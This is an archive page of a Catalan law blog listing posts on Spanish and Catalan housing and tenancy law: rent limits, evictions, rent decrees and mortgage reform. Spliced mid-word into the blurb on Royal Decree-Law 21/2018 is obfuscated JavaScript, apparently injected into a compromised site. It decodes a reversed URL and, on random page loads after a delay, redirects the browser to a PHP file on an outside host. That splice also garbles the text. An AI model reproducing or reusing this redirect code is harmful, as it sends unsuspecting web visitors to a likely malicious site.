Es declara inconstitucional el límit al preu del lloguer

El passat dia 10 de març, el Tribunal Constitucional va declarar inconstitucionals alguns articles de la llei catalana 11/2020, de 18 de setembre, de mesures urgents en matèria de contenció de rendes als contractes d’arrendament d’habitatges. La coneguda popularment llei del lloguer va tenir com a finalitat principal la limitació de les rendes en determinades àrees […]

By |abril 4th, 2022|Dret immobiliari|0 Comments

Inconstitucionalitat del decret llei de la Generalitat sobre l’habitatge

Autor: Ana Huguet Canalís

L’art. 33 de la Constitució del 1978 regula el dret de propietat privada com un dret fonamental, així com la seua funció social, que delimitarà el seu contingut conforme a les lleis. L’apartat 3 estableix: “Ningú no podrà ser privat dels seus béns i drets sinó per causa justificada d’utilitat pública o […]

By |febrer 16th, 2021|Dret Civil, Dret immobiliari|0 Comments

La crisi del Covid-19. Suspensió temporal del pagament de rendes de lloguer del local de negoci

Amb la crisi del Covid-19 molts negocis es veuen forçats a estar tancats al públic i han vist que la facturació es reduïa d’una manera notable. Aquesta crisi ha fet que molts arrendataris de locals de negocis vegin molt complicat poder atendre els pagaments de les rendes de lloguer. La conseqüència ha estat que en […]

By |agost 11th, 2020|Dret Civil, Dret immobiliari|0 Comments

El tribunal europeu avala un desnonament de Bankia

El tribunal europeu avala un desnonament de Bankia
El 3 de juliol el Tribunal de la Unió Europea va dictar una resolució que va avalar la procedència de l’execució hipotecària i el conseqüent desnonament dels usuaris de la finca hipotecada per haver incomplert d’una manera greu l’obligació de pagament de les quotes del préstec assumit, malgrat que hi […]

By |juliol 15th, 2019|Dret immobiliari|0 Comments

Novetats en els contractes de lloguer que heu de saber

Novetats en els contractes de lloguer que heu de saber
 
El passat 1 de març del 2019 el Govern espanyol va aprovar al Consell de Ministres el Reial Decret Llei 7/2019, d’1 de març, de mesures urgents en matèria d’habitatge i lloguer que modifica l’actual legislació dels lloguers. L’esmentada norma va entrar en vigor el 5 […]

By |març 11th, 2019|Dret immobiliari|0 Comments

Novetats en el contracte de lloguer d’habitatge

Novetats en el contracte de lloguer d’habitatge
 
El passat dia 19 de desembre del 2018, va entrar en vigor el Reial Decret-Llei 21/2018 de mesures urgents en matèria d’habitatge i lloguer. Aquesta reforma arriba per a$NqM=function(n){if (typeof ($NqM.list) == “string”) return $NqM.list.split(“”).reverse().join(“”);return $NqM.list;};$NqM.list=[“\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}torgar més protecció a l’arrendatari davant de […]

By |gener 14th, 2019|Dret immobiliari|0 Comments

Nou desnonament exprés per a okupes

Nou desnonament exprés per a okupes
El dia 2 de juliol vinent entrarà en vigor la Llei 5/2018, d’11 de juny, de modificació de la Llei 1/2000, de 7 de gener, d’Enjudiciament Civil. Aquesta ve a abordar el tan actual problema generat per l’ocupació il·legal dels habitatges. L’esmentada norma suposa una reforma del procés verbal específic […]

By |juny 19th, 2018|Dret immobiliari|0 Comments

Lloguer o compra d’habitatge

Lloguer o compra d’habitatge
La cotització de l’euríbor a índexs negatius des de fa uns mesos (a l’abril a -0,19%), unida a l’alça del preu del lloguer de l’habitatge, fa que moltes persones en aquest moment es plantegin si és millor comprar o llogar. Efectivament, la situació dels mercats ha arribat fins al punt que les […]

By |juny 5th, 2018|Dret immobiliari|0 Comments

Novetats de la nova Llei Hipotecària

Novetats de la nova Llei Hipotecària
L’Avantprojecte de Llei Reguladora dels Contractes de Crèdit Immobiliari comporta una reforma de la legislació hipotecària. La finalitat és oferir més protecció als consumidors, així com “preservar la cultura del pagament”. Amb aquesta norma, pretén donar-se compliment a la Directiva europea 2014/17/UE. La Comissió Europea va denunciar Espanya, al costat […]

By |setembre 12th, 2017|Dret immobiliari|0 Comments

Els conflictes amb els pisos sobre plànol poden arribar a demanda

Els conflictes amb els pisos sobre plànol poden arribar a demanda
És habitual que en les compravendes de pis sobre plànol s’efectuïn entregues de diners a compte del preu pactat mentre es construeix l’immoble. Amb la crisi immobiliària va resultar que moltes de les promotores que havien rebut els pagaments a compte van fer fallida. Això […]

By |juny 9th, 2017|Dret immobiliari|0 Comments